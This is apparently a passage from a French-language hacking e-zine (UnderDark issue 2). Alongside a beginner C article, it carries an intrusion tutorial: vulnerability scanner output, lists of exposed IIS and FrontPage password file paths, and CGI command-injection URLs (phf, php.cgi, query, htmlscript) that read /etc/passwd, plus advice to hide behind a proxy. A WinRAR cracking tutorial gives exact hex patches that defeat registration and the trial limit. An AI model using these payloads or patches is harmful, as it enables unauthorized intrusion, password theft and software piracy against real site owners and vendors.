Le Social Enginnering reste un technique peu utiliser, c'est pourquoi je ne donne pas beaucoup 
de détail sur les techniques car je n'ai fait que vous expliquez le principe. J'espère que si
cela vous intérresse vous serez en mesure de le pratiquer.

[ALIENS]

	*************************************************************************
	* 			Random Quote Player						*			
	*<DaRk^Ev|L>essai de me hacker voir							*
	*<DaRk^Ev|L> chu partitionner en LINUX						*
	*												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [10]-- Petite base sur le coding en c		        |
  | 	   			Par Kool_Shen		        |
  |        Sujet: Coding            		        |
  |							              | 
   \___________________________________________________/


Bon moi c le premire article que je fais, fack je vais faire mon possible pour essayer de 
faire appendre au autre qui commence. Moi j ai choisi de vous parler un du langage en C
Plusieur personne se serve de se moyen pour programmer!! Il vous faut le le compilateur.

1-Les compilateurs C font subir deux transformations aux programmes : 

-Premiêrement:
 	un préprocesseur réalise des transformations d'ordre purement textuel, pour
rendre des services du type inclusion de source, compilation conditionnelle, et 
traitement de macros 

-Deuxiêment:
	le compilateur proprement dit prend le texte généré par le préprocesseur et
le traduit en instructions machine. 
La fonction de préprocesseur est assez souvent implémentée par un programme
séparé qui est automatiquement appelé par le compilateur


2-Je vais vous donner la liste exhaustive des mots-clés pour pouvoir reéussir.

auto            double         int             struct
break           else           long            switch
case            enum           register        typedef
char            extern         return          union
const           float          short           unsigned
continue        for            signed          void
default         goto           sizeof          volatile
do              if             static          while



Attention:
	Si le compilateur produit un message d'erreur syntaxique 
incompréhensible il est recommandé d aller consulter
la liste des mots clés pour vérifier que l'on a
pas pris comme identificateur un mot-clé. Si le lecteur 
désire être convaincu, il lui est suggéré de donner le nom
long à une variable entière. 

Je vais finir par vous parler d'un dernier point qui est les identificateurs.


3.Les identificateurs 
    
Le but d'un identificateur est de donner un nom à une 
entité du programme (variable, procédure, etc.) Les identificateurs
sont formés d'une suite de lettres, de chiffres et du signe souligné,
suite dont le premier caractère ne peut pas être un chiffre. Les
lettres formant les identificateurs peuvent être majuscules ou 
minuscules, mais doivent faire partie de l'alphabet anglais : 
les lettres accentuées sont interdites. Les noms var1, PremierIndex, 
i_tab, _deb sont des identificateurs valides, mais 1i et i:j ne le sont
 pas. 

Un compilateur a le droit de tronquer les identificateurs internes au delà d'une 
certaine longueur. Cette limite dépend de l'implémentation, mais ne doit pas être 
inférieure à 31 caractères. 

De la même manière, les identificateurs externes pourront être tronqués
au delà d'une certaine longueur. Cette limite est généralement plus sévère, 
mais ne peut être inférieure à 6 caractères. De surcroît, la distinction entre 
minuscules et majuscules n'est pas garantie.


Bon ben moi j'ai fini fack j'espêre que je vais refaire d autre article pour UnderDark car je 
suis membre fack il le faut aussi. J'espere que je vous allez apprécié. PIS FUMER A FOND 
CRISSSSSS et ne po oublier de BAISER AUSSI CRISSSS.

	*************************************************************************
	* 			Random Quote Player						*			
	*<MagicianX>pour hacker le mieux c'est une hache de pompier ou bien un  *
	*bat de baseball en bois								*
	*												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [11]-- Comment Rentrer Dans Un Systeme		  |
  | 	   			Par DePotEdon			  |
  |        Sujet: Hacking            		        |
  |							              | 
   \___________________________________________________/


#1 
la premier facon vous allez me dire quelle est cheap ben c vrai est cheap
en TBNK (tabarnack)

bon ce qu'il vous faut : Un scanner de Cgi hole et etc..
deuxiemement un cerveau qui est pas trop maganer :P
(parole tirer de {{SmUG}})

bon nous alons prendre comme exemple www.victim.com et le scanner de hole TWWWSCAN

alors (si vous finissez par le trouver ;P) vous tapper en commande ms-DOS : 
twwwscan www.victim.com -pa 
-pa = pour all
bon donc nous commencon nous recevons comme msg ceci :

C:\WINDOWS\Bureau\Downloads>twwwscan www.victim.com -pa

                                               TWWWscan ver 0.3 2k.05
                                               made by twenty sad soul
                                               thanks 34gl3,ligerteam
Connecting HTTP Port - Result: www.victim.com Connect Success

- Checking HTTP Header -
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Content-Location: http://127.0.0.1/index.html
AuthentiX Version 4.8d: 9211574000
AuthentiX Version 4.8d: 9211574000
Date: Sat, 05 Aug 2000 18:32:45 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Sat, 05 Aug 2000 18:25:23 GMT
ETag: "e4f33185affbf1:2adb1"
Content-Length: 410

- Checking NT WWW Vulnerabilities -
Checking: Websites (uploader.exe)                       NOT
Checking: Remote File create,IIS DoS(newdsn.exe)   !!! FOUND !!!
Checking: Frontpage98  Hole(_vti_inf.html)         !!! FOUND !!!
Checking: Frontpage98 Hole(administrators.pwd)          NOT
Checking: IIS Web Password Hole(achg.htr)          !!! FOUND !!!
Checking: IIS Web Password Hole(aexp.htr)          !!! FOUND !!!
Checking: IIS Web Password Hole(aexp2.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp2b.htr)        !!! FOUND !!!
Checking: IIS Web Password Hole(aexp3.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp4.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp4b.htr)        !!! FOUND !!!
Checking: IIS Web Password Hole(anot.htr)          !!! FOUND !!!
Checking: IIS Web Password Hole(anot3.htr)         !!! FOUND !!!
Checking: Omi HTTPD (visadmin.exe)                      NOT
Checking: IIS Perl Security Hole                        NOT
Checking: IIS (fpcount.exe) DoS                         NOT
Checking: WebCom Guestbook Hole(rquest.exe)             NOT
Checking: WebCom Guestbook Hole(wguest.exe)             NOT
Checking: IIS Data Stream Hole                          NOT
Checking: IIS (codebrws.asp) Hole A                     NOT
Checking: IIS (codebrws.asp) Hole B                     NOT
Checking: IIS (showcode.asp) Hole                  !!! FOUND !!!
Checking: SiteServer AdSamples(site.csc)                NOT
Checking: Peer Webservice Hole(ism.dll)                 NOT
Checking: ASP Sample ODBC Hole(catalog_type.asp)        NOT
Checking: ColdFusion  Hole(openfile.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(openfile.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(explcalc.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(displayopenedfile.cfm)  !!! FOUND !!!
Checking: ColdFusion  Hole(sendmail.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(GetFile.cfm)            !!! FOUND !!!
Checking: Alibaba Multiple CGI(get32.exe)               NOT
Checking: Alibaba Multiple CGI(alibara.pl)              NOT
Checking: Alibaba Multiple CGI(tst.bat)                 NOT
Checking: IIS Double Byte Hole                          NOT
Checking: TeamShare TeamTrack V3.0 Hole                 NOT
Checking: OmniHTTPd 1.01,Pro2.04 bof(imagemap.exe)      NOT
Checking: W4-Server2.6a(cgitest.exe)                    NOT
Checking: URL Live! 1.0 WebServer Hole                  NOT
Checking: WebBBS Hole(webbbs.exe)                       NOT
Checking: AN-HTTPd 1.20b Hole(test.bat)                 NOT
Checking: AN-HTTPd 1.20b Hole(input.bat)                NOT
Checking: AN-HTTPd 1.20b Hole(input2.bat)               NOT
Checking: RDS Securty Hole(msadcs.dll)             !!! FOUND !!!
Checking: Frontpage path,bof(htimage.exe)               NOT
Checking: IIS Path Reveal(anything.idc)                 NOT
Checking: IIS Path Reveal(anything.idq)            !!! FOUND !!!
Checking: IIS Path Reveal(anything.ida)            !!! FOUND !!!
Checking: IIS Path Reveal(anything.idw)                 NOT
Checking: counter.exe DoS                               NOT
Checking: IIS ASP VBScript Error                        NOT
Checking: Sambar Server Batch CGI(echo.bat)             NOT
Checking: Sambar Server Batch CGI(hello.bat)            NOT
Checking: Right Fax Web Client (fuwww.dll)              NOT
Checking: CGI Mailer Hole(cgimail.exe)                  NOT
Checking: IIS UNC Mapping Hole                          NOT
Checking: Trend OfficeScan Hole(jdkRqNotify.exe)        NOT
Checking: Oracle Web Listener Batch Hole(*.bat)         NOT
Checking: WinMail Hole (winmail.exe)                    NOT
Checking: Malformed Hit-Highlighting Argument           NOT
Checking: Index Server Security Hole(null.htw)     !!! FOUND !!!
Checking: MS frontpage98 backdoor,bof(dvwssr.dll)       NOT
Checking: Web Archive version 1.8d bof(wa.exe)          NOT
Checking: Cart32 Backdoor(cart32.exe)                   NOT
Checking: Cart32 Backdoor(c32web.exe)                   NOT
Checking: DNews News Server bof(gupcgi.exe)             NOT
Checking: DNews News Server bof(dnewsweb.exe)           NOT
Checking: DMailweb bof(dmailweb.exe)                    NOT
Checking: Bugzilla 2.8(process_bug.cgi)                 NOT
Checking: Bugzilla 2.8(enter_bug.cgi)                   NOT
Checking: Rockliffe MailSite bof(wconsole.dll)          NOT
Checking: Pacific Soft Carello(add.exe)                 NOT
Checking: PDGsoft Shopping Cart(redirect.exe)           NOT
Checking: PDGsoft Shopping Cart(changepw.exe)           NOT
Checking: THC Web Backdoor(rwwwshell.pl)                NOT
Checking: Un1G Web Backdoor(un1g1.1)                    NOT
Checking: Un1G Web Backdoor(un1g1.2)                    NOT
Checking: PHF(phf)                                      NOT
Checking: PHF(phf.cgi)                                  NOT
Checking: test-cgi                                      NOT
Checking: Local host finger (finger)                    NOT
Checking: Count.cgi bof(Count.cgi)                      NOT
Checking: Escape to a shell(jj)                         NOT
Checking: IRIX(day5datacopier.cgi)                      NOT
Checking: IRIX(day5datanotifier.cgi)                    NOT
Checking: bof(php.cgi)                                  NOT
Checking: php                                           NOT
Checking: nph-test-cgi                                  NOT
Checking: nph-publish                                   NOT
Checking: IRIX(handler)                                 NOT
Checking: IRIX(webdist.cgi)                             NOT
Checking: coldFusion Dos(startstop.html)           !!! FOUND !!!
............. je ne suis pas pour tous vous les montrer sinon mon article va prendre 3mo :\
-----------------------------------------------------------------------------------------------
donc avec toute ces faille la nous pouvons essailler des cossin (via un proxys :) ) 
*tres recommender :P

vous pouvez essailler des cossin du style (prennons toujour victim.com comme example) 

www.victim.com/null.htw des connerie dememe :P

ci vous vous demander ou jai pecher le null.htw bien c simple il est dans la list ke je 
vous ai donner : 

Checking: Index Server Security Hole(null.htw)     !!! FOUND !!!

C'est pas cool ca pour un admin de reseau ;P

vous pouvez essailler aussi : www.victim.com/startstop.html 
(personnelement jai aucune idee de savoir ce ke ca peut donner ;P
-----------------------------------------------------------------------------------------------
vous pouvez tester cela aussi : www.victim.com/
tous ce ki a ete marquer !!!FOUND!!!
Checking: Remote File create,IIS DoS(newdsn.exe)   !!! FOUND !!! 
http://lehost.net/scripts/tools/newdsn.exe 
Checking: Frontpage98  Hole(_vti_inf.html)         !!! FOUND !!!
Checking: IIS Web Password Hole(achg.htr)          !!! FOUND !!! Hummmm des pass ;P
Checking: IIS Web Password Hole(aexp.htr)          !!! FOUND !!!
Checking: IIS Web Password Hole(aexp2.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp2b.htr)        !!! FOUND !!!
Checking: IIS Web Password Hole(aexp3.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp4.htr)         !!! FOUND !!!
Checking: IIS Web Password Hole(aexp4b.htr)        !!! FOUND !!!
Checking: IIS Web Password Hole(anot.htr)          !!! FOUND !!!
Checking: IIS Web Password Hole(anot3.htr)         !!! FOUND !!!
Checking: IIS (showcode.asp) Hole                  !!! FOUND !!! 
Il semblerais ke ca donne les code ou dekoi dememe ? Peut etre interessant pour reussir a 
modifier la page ;P
Checking: ColdFusion  Hole(openfile.cfm)           !!! FOUND !!! Jai aucune idee de savoir 
a koi ca sert mais je vous Recommande daller lire le pupucgi99 (il a p-e se que vous chercher)
Checking: ColdFusion  Hole(openfile.cfm)           !!! FOUND !!!  
Checking: ColdFusion  Hole(explcalc.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(displayopenedfile.cfm)  !!! FOUND !!!
Checking: ColdFusion  Hole(sendmail.cfm)           !!! FOUND !!!
Checking: ColdFusion  Hole(GetFile.cfm)            !!! FOUND !!!
Checking: RDS Securty Hole(msadcs.dll)             !!! FOUND !!! 
LE FOUTU RDS!!!! jai aucune asti didee de savoir comment ca  marche mais ci vous voulez le 
savoir aller teter THIX :P sur qha je croix ke son nick est th[|]x] je suis pas certin
Checking: IIS Path Reveal(anything.idq)            !!! FOUND !!!
Checking: IIS Path Reveal(anything.ida)            !!! FOUND !!! il semblerais ke ca vous 
donne de linfo sur kelke chose mais je ne sais pas koi :\
Checking: Index Server Security Hole(null.htw)     !!! FOUND !!! Dunno aller voir encor une 
fois larticle de putois sur les Cgi 
Checking: coldFusion Dos(startstop.html)           !!! FOUND !!! me suis informer pi personne 
le sais :\ encor une fois pupucgi ;P
-----------------------------------------------------------------------------------------------------------------------------
comment verifier la plupart des exploit trouver sur un site : (ligne de code tirer du 
programme TWWWSCAN 0.45)

Toujour en ce basant sur lurl www.sitenoname.com

advsearch.asp : /iissamples/exair/search/advsearch.asp 
carbo.dll : /carbo.dll (rien deplus)
uploader.exe : /cgi-win/uploader.exe
search97.vts : /search97.vts (lui aussi rien de plus :)..)
newdsn.exe : /scripts/tools/newdsn.exe
getdrvs.exe : /scripts/tools/getdrvs.exe

apartir dici nous allons nous etablir sur les bug classique relier a FP98 (front page) :
/_vti_inf.html
/_vti_pvt/service.pwd
/_vti_pvt/users.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/shtml.dll
/_vti_pvt/shtml.exe

BON! c deja tout pour le front page bug :P (rienque ca :P) 
reprenons avec dautre bug maintenant
/samples/search/queryhit.htm 
/....../autoexec.bat 
/..../config.sys 
/iisadmpwd/achg.htr 
/iisadmpwd/aexp.htr 
/iisadmpwd/aexp2.htr 
/iisadmpwd/aexp2b.htr 
/iisadmpwd/aexp3.htr 
/iisadmpwd/aexp4.htr 
/iisadmpwd/aexp4b.htr 
/iisadmpwd/anot.htr 
/iisadmpwd/anot3.htr 
/cgi-bin/visadmin.exe 
/scripts/no-such-file.pl 
ET PLEIN DAUTRE mais la je commence a trouver ke c EN MASSE! :P

-----------------------------------------------------------------------------------------------
Pour ceux ki ne connaissent pas PupuCgi99.zip c un article ecrit par Putois Alias cheoles 
(qhaien) MAIS il est tres complet larticle et il est retrouvable sur www.madchat.org aller le 
lire je vous jure voue ne serer pas decu :) il parle de plusieur bug via front page, 
cold_fusion et plein de chose..
-----------------------------------------------------------------------------------------------


Maintenant ma ESSSAYER de vous expliquer les BUG cgi : 

Il y PHF, PHP, QUERY, HTMLSCRIPTS

commencon par vous expliquer ce ke chaqun des CGI font : 

PHF : On peut apeller ca des "Filtre" et en tappant une certaine ligne de "code" nous pouvons 
acceder a une base de donner de mot de pass (/etc/passwd)

comment reussir a les optenir je vais vous le montrer c plutot simple vous commencer par 
scanner la page web avec un scaner de cgi kelkonke et ci il dit /cgi-bin/PHF.cgi FOUND ou 
trouver Peut importe ben vous aller pouvoir acceder a ces pass (a ce ke je sais ca ne marche 
pas avec nimporte kel version)

Maintenant etander que je sais tres bien que vous vous languisser d'attente pour pouvoir 
acceder au passwd je vais vous la donner la ligne de commande elle va comme suis : 
www.unsitenoname.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd (a utiliser avec un proxys 
sinon ca va logger votre ip pi ca va lenvoyer a votre fournisseur internet:P)

Recapitulons la ligne de commande est /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd  c 
simple non? vous scanner vous trouver  vous crisser la petite ligne a la fin de lurl pi le 
tour est jouer ;P (ca ne marche pas avec les page personnele)


Bon Maintenant les PHP : les PHP sont aussi un fitre avec le quelle un peu acceder a des 
passwd (/etc/passwd)

pour i aller nous alons tapper (c semblablement la meme chose pour PHP PHF pi html mais ya 
une petit difference)

:
http://www.unsitenoname.com/cgi-bin/php.cgi?/etc/passwd

ceci est senser nous donner les passwd du root sans trop ce forcer :) pour savoir comment les 
decrypter aller lire le zine #1 artcile de mindflayr il nous explique tres clairement comment 
les decrypter avec notre bonne amis john :)

il a aussi un autre bug avec PHP le voici  : www.unsitenoname.com/cgi-bin/php?/etc/passwd 
(le resultat est toujour le meme)

maintenant le Query : encor une fois www.sitenoname.com/cgi-bin/query?%0a/bin/cat%20/etc/passwd 
ce ci vous donne encore le meme resultat c a dire les passwd du root et des autre utilisateur 
de la page web ainsi ke de certain shell ou peut importe ca depend tout le temp ;)

Et finalement le dernier mais non le moindre ; HtmlScript son seul defaut c ke lon doit savoir
ou se trouve les dossier ;\

mais bon ca vaut la peine de le dire quand meme : 
www.sitenoname.com/htmlscript?.../.../.../etc/passwd (les trois petit point represente un 
dossier (bien entendu ca pourais etre juste /etc/passwd MAIS ca serait stupide :P )

Jespere que cette artcile vous auras plus moi jen suis quand meme asser fier ;) 
 
DePotEdon 

	*************************************************************************
	* 			Random Quote Player						*			
	*<Trinit|> pquoi win est pas compatible avec lui meme snif			*
	*<Spirit-> ce serait trop simple sinon ;p						*
	*												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [12]-- Talentsoft WebPlus Application Server	  |
  | 	   			Par Mind Flayer			  |
  |        Sujet: Hacking            		        |
  |							              | 
   \___________________________________________________/

Bon, un petit article sur une nouvelle faille decouverte dans un des nombreux httpd couramment
utilisé sur le web. Comem quoi il n'y a pas que Apache qui est vulnerable. Ce serveur de la
compagnie Talentsoft fonctionne sous Windows 2000 et Linux. Pour ceux qui voudraient plus 
d'information sur le programme en tant que tel il suffit d'aller sur le site web de la 
compagnie [http://www.talentsoft.com]. Bon maintenant se qui vous interresse surement c'est a
dire les failles...

Il est possible de forcer WebPlus à nous montrer le fichier ou il a été installé.
Il suffit d'ouvrir son browser favoris (netscape ou explorer ou encore opera etc..) et d'aller
sur la page ou le serveur est installer selon la forme suivante.
Http://www.vulnerable.com/cgi-bin/webplus.exe?script=.
Ceci afficheras un message d'erreur en plus de nous donner quelques informations utiles.
La partie la plus interessante étant bien sur quelque chose du genre

Troubleshooting Information
Check the logical and physical paths for "D:\webplus\script\" and make it sure it is in 
the right directory. Also Verify the file's integrity.

Bon pas de quoi faire une révolution mais quand meme...

Bon une autre faille un peu plus interessante nous permet de découvrir le vrai ip du serveur
si il est derriere un firewall ou quelque chose du genre. Il permet aussi de savoir le type 
exact du server, le nom sous lequel il est licensier etc...
Il suffit d'aller avec son browser sur
http://www.vulnerable.com/cgi-bin/webplus.exe?about
Et voila :)

C'ets peut-etre pas asser pour hacker la NASA mais au moins ca va vous permettre de vous amuser
un peu.

											Mind Flayer

	*************************************************************************
	* 			Random Quote Player						*			
	*<Trinit|> pquoi win est pas compatible avec lui meme snif			*
	*<Spirit-> ce serait trop simple sinon ;p						*
	*												*
      *************************************************************************
 
    ___________________________________________________
   / 						       		 \		
  | [13]-- Crack WinRar 2.50					  |
  | 	   			Par Sulfur'X			  |
  |        Sujet: Cracking            		        |
  |							              | 
   \___________________________________________________/

Ceci est mon premier tutorial (je cracke que depuis 6 mois), alors soyez
indulgents envers moi, et tachez, svp, de ne pas trop m'en vouloir si ce n'est pas
comme il le faudrait, merci.

Nous nous attaquerons aujourd'hui à WinRAR 2.50 finale. Ce logiciel,
ressemblant de plus en plus à Winzip est devenu très bien et très utile. Cette
version de WinRAR est donc protégée par un serial et utilisable seulement 40
jours. La version beta accepte exactement le même principe sauf pour les
adresses qui sont, peut être differentes.

La protection de ce logiciel est très facilement crackable, et très bien pour les
newbies.

Logiciels utilisés: W32Dasm 8.93, Hexworkshop 2.54 (ou autre éditeur
héxadécimal)

1) Approche:

Lorsqu'on regarde le logiciel on s'apperçoit que le logiciel comporte toutes ses
fonctionalités mais qu'il est bridé dans le temps (40 jours) et que l'on peut
s'enregistrer avec un serial. Evaluation copy est incrit tout en haut. Nous allons
cracker ce logiciel, et non trouver un serial avec Soft Ice (si vous voulez des
serials trouvez Serial 99 et vous ne serez pas deçu)

Nous avons assez d'éléments pour pouvoir commencer a désassembler, GO !!!

2) Dead - Listing

On désassemble (WinRAR.exe) et on regarde les String Data References. On en
trouve quelques unes interresantes: "Thank you for support", "Correct
registeration", "Registeration failled" et "Evaluation copy" (comme ce qui est
marqué dans le 'titre' - en haut quoi - ).

Attaquons nous a "Evaluation copy". 

On cherche aux alentours de la String Data Reference s'il n'y a pas un saut
conditionnel qui evite ou qui saute sur cette partie donc on remonte un peu et la
on voit un gros saut conditionnel qui évite quelques lignes, on réfléchit une
goutte et on se dit: Si le logiciel est enregistré on saute et par conséquent on évite
cette partie de code. Si par contre on n'est pas enregistré on ne saute pas et on
continue ce qui nous fait apparaître un beau [Evaluation copy] sur l'écran (à
cause du call)

* Possible StringData Ref from Data Obj ->"%s - WinRAR"

           :00415691 68F2144500 push 004514F2
           :00415696 8D9500FEFFFF lea edx, dword ptr [ebp+FFFFFE00]
           :0041569C 52 push edx
           :0041569D E81A330300 call 004489BC
           :004156A2 83C40C add esp, 0000000C
           :004156A5 833D8426450000 cmp dword ptr [00452684], 00000000
           :004156AC 752F jne 004156DD ,<=saut conditonnel interressant,

           * Possible Reference to String Resource ID=00873: "evaluation copy"

           :004156AE 6869030000 push 00000369
           :004156B3 E8D41CFFFF call 0040738C ,<= apparition du [evaluation copy]
           sur l'écran,
           :004156B8 59 pop ecx
           :004156B9 50 push eax

Alors on réfléchit encore un peu et on se dit qu'il faut qu'il saute tout le temps,
et donc on le remplace par un jmp

Alors on recherche la chaine héxa "752F6869030000E8" qu n'apparaît qu'une
seule fois et on la remplace par "EB2F6869030000E8" on lance WinRAR et
qu'est ce qu'on voit (ou ne voit plus plutôt !) Eh oui, Le "[evaluation copy]" a
disparu !

Maintenant nous pouvons faire quelque chose d'interressant mais pas forcement
utile vous vous souvenez du "Thank you for support", "Registeration failled", et
"Correct registeration" ? Et bien il va nous être utile maintenant: On va faire en
sorte que le serial soit toujours correct.

Alors on est sur la String Data Reference "Thank you for support", et on
recherche comment ca marche. On remonte un peu et on arrive sur "Correct
registeration", on remonte encore un peu et là, Oh bonheur, "Registeration
failled", et là on se dit si la 'registeration n'est pas bonne c'est peut être que le
serial n'est pas bon ?! Et en remontant un tout petit peu qu'est ce que l'on voit:
un saut conditionnel!Et lorsqu'il saute il se retrouve a la ligne au dessus
de..."Correct registeration".

:0040A4DE 83C408 add esp, 00000008
           :0040A4E1 85C0 test eax, eax
           :0040A4E3 752C jne 0040A511 ,<= s'il saute c'est gagné,
           :0040A4E5 6A30 push 00000030

           * Possible Ref to Menu: MAIN_MENU, Item: ""

           * Possible Reference to Dialog: ABOUTRARDLG, CONTROL_ID:0065, ""

           * Possible Reference to String Resource ID=00101: "Warning"

           :0040A4E7 6A65 push 00000065
           :0040A4E9 E89ECEFFFF call 0040738C
           :0040A4EE 59 pop ecx
           :0040A4EF 50 push eax

           * Possible Reference to String Resource ID=00870: "Registration failed"

           :0040A4F0 6866030000 push 00000366
           :0040A4F5 E892CEFFFF call 0040738C
           :0040A4FA 59 pop ecx
           :0040A4FB 50 push eax
           :0040A4FC 8B4D08 mov ecx, dword ptr [ebp+08]
           :0040A4FF 51 push ecx ,<= si le saut précedent saute il arrive ici,

           * Reference To: USER32.MessageBoxA, Ord:0000h

           :0040A500 E87C400400 Call 0044E581
           :0040A505 33C0 xor eax, eax
           :0040A507 A384264500 mov dword ptr [00452684], eax
           :0040A50C E9F9000000 jmp 0040A60A

           * Referenced by a (U)nconditional or (C)onditional Jump at Address:

           |:0040A4E3(C)
           |
           :0040A511 6A40 push 00000040

           * Possible Reference to String Resource ID=00872: "Correct registration"

           :0040A513 6868030000 push 00000368
           :0040A518 E86FCEFFFF call 0040738C
           :0040A51D 59 pop ecx
           :0040A51E 50 push eax

           * Possible Reference to String Resource ID=00871: "Thank you for support"

           :0040A51F 6867030000 push 00000367
           :0040A524 E863CEFFFF call 0040738C
           :0040A529 59 pop ecx
           :0040A52A 50 push eax
           :0040A52B 8B5508 mov edx, dword ptr [ebp+08]
           :0040A52E 52 push edx

Donc pour pouvoir sauter tous le temps nous remplacerons ce jne par un jmp
c'est à dire:on recherche la chaine "752C6A306A65E89E"avec l'editeur héxa, et
nous la remplacons par "EB2C6A306A65E89E"

3)Fonctions désactivées

N'ayant pas vu qu'il existait des fonctions désactivées, LuNaTiC me l'a fait
remarquer et m'a donné une méthode, je la reprendrais intégralement.

Lorsqu'on utilise la fonction 'add' (clique droit ou dans le logiciel) il existe deux
fonctions désactivées qui ne fonctionnent que lorsqu'on est enregistré:

     . 'Put Authenticy Verification'

     . 'Erase destination disk contents before archiving'

Si l'on est pas enregistré un beau msg box nous apparait nous disant que cette
fonction n'est valable que dans une version enregistrée. Nous allons donc faire en
sorte que ces fonctions soient utilisables dans notre version.

Tout d'abord posons un break point sous SIce (bpx messageboxa), on quitte SIce
on coche l'option 'Put Authenticy Verification' dans la fonction 'add' et là on
saute sous SIce. Pour quitter l'Api on appuie sur F12. Là on quitte SIce. On
clique sur le 'OK' de la msg box nous disant que la fonction n'est pas valide, et
on retourne sous SIce, juste après le call, donc on remonte un peu et on trouve
un 'jnz 0040C0A8' qui est très interressant.

           :0040C07B 833D8426450000 cmp dword ptr [00452684], 00000000
           :0040C082 EB24 jnz 0040C0A8 <= un saut interressant
           :0040C084 6A30 push 00000030


Dans Soft Ice on efface l'ancien bp (bc*, ou bc0) on clique deux fois sur le jnz
comme ça on pose un break point sur cette adresse, on quitte SIce (Ctrl + D) on
coche l'option 'Put Authenticy Verification' et on saute sous SIce, ce qui veut
dire que c'est le bon saut qui appelle le call. Sous SIce on désassemble
l'instruction (A) et on remplace le jnz 0040C0A8 par un jmp 0040C0A8.

Et là ça marche mais pas pour longtemps car c'est juste dans la mémoire. On
utilise l'éditeur héxa on recherche la chaine suivante : 

     75246A306A65E8FF

On la remplace par :

     EB246A306A65E8FF

On fait un clique droit sur un fichier, ensuite 'add' on coche l'option eeet là ca
marche: plus de msg box !

Maintenant il faut faire exactement pareil pour la deuxième fonction désactivée :
'Erase destination disk contents before archiving'.

On lance SIce on pose un bpx messageboxa, on retourne sous win on coche
l'option 'Erase destination disk contents before archiving' on saute sous SIce on
appuie sur F12 pour sortir de l'Api, on clique sur le 'OK' de la msg box, là on
saute sous SIce juste après le call on remonte un peu dans les instructions, on
retrouve encore un jnz on clique deux fois dessus pour poser un bp à cette
adresse.

 :0040C0AF 833D8426450000 cmp dword ptr [00452684], 00000000
 :0040C0B6 EB24 jnz 0040C0DC <= encore un saut interressant !
 :0040C0B8 6A30 push 00000030


On quitte SIce, on coche l'option 'Erase destination disk contents before
archiving' on ressaute sous SIce on assemble les instructions en changeant le jnz
0040C0DC par un jmp 0040C0DC, là ça marche, mais il faut changer le saut
avec l'éditeur héxa. Donc on recherche la chaine :

     75246A306A65E8CB

qu'on remplace par :

     EB246A306A65E8CB

Ca y est il n'y a plus de fonctions désactivées (à ma connaissance), ou si vous en
trouvez une mailez-moi !

     4)Résumé
Il y a quatre endroits où il faut patcher:

     752F6869030000E8

     EB2F6869030000E8
et :

     752C6A306A65E89E

     EB2C6A306A65E89E
et aussi :

     75246A306A65E8FF

     EB246A306A65E8FF
et encore :

     75246A306A65E8CB

     EB246A306A65E8CB

Et voilà, mon premier tut. est terminé, si vous pensez toutefois que WinRAR est
mal cracké, ou si une autre méthode existe, ou si encore vous avez des
commentaires, n'hésitez pas à m'envoyer un petit mail à 

                             sulfur_x@hotmail.com

 

Un grand merci à tous les crackers qui nous font des cours, Merci à LuNaTiC
qui m'a montré qu'il existait deux fonctions désactivées, et merci aussi à
Zip_Man qui m'a fait découvrir cet, merveilleux, art, qu'est le cracking...




	*************************************************************************
	*          ..--""|									*
      *	     | UD  |		Écriver-nous!!		         		*
     	*	     | .---'	      Commentaires, insultes, suggestions		*
  	*	  (\-.--| |---------.								*
  	*	 / \) \ | |          \		team@underdark.cc				*
 	*	 |:.  | | |  The      |								*
	*	 |:.  | |o|   Under   |		ou venez nous voir sur irc	      *
	*	 |:.  | `"`     Dark  |		#UnderDark					*
  	*	 |:.  |_ __  __ _  __ /		[us.undernet.org]				*
  	*	 `""""`""|=`|"""""""`								*
      *    		   |=_|		Site Web: www.underdark.cc			*
      *              |= |									*
	*************************************************************************





Conclusion
==========
Bon, le numéro 2 est déja terminer, j'espere que vous l'avez apprécier autant qu'on a apprécier
le faire. Si vous voulez participer au numéro 3. Vener nous voir sur irc [#underdark sur 
us.undernet.org] ou encore visiter notre site web [www.underdark.cc]. Comme le crew est 
presentement en recontruction, si vous posseder quelque talents que se soit que sa soit dans
la programmation, le hacking, linux, le phreaking ou totu se qui est relié avec l'underground
informatique, ne vous gener pas a venir nous voir. Bon la propagande est fini, je tiens
seulement a dire que malgres notre petite taille dans la petite scene francophone, j'espere
que UnderDark sera vous plaire et peut-etre meme faire avancer les choses. La scene américaine
peux encore nous regarder de haut, on dirais que nous avons une tendance a l'auto-denigrement.
Parce que entre vous pis moi, la plupart ( et je dis bien la plupart) des crew americains
n'arrivent pas a la cheville de plusieurs groupes quebecois ou francais. (je ne parle pas bien
sur de l0pht ou 2600...). Je crois qu'il serait interessant d'etre peut-etre un plus present et
accessible sur le net ou sur le web. Appeler cela une ouverture sur le monde ou peu importe
mais la plupart des sites de hack quebecois ( si on ne tient pas compte des merdes) ne figurent
pas sur aucun engins de recherches majeur. Peut-etre qu'un portail a la HNN version quebecoise
ne nous ferais pas de tort. Je vous laisse mediter la dessus et ecriver moi pour tout 
commentaires a propos du zine ou de n'importe quoi d'autre.
											Mind Flayer



											T.H.E. E.N.D.










































J'ai dit que c'étais fini bon...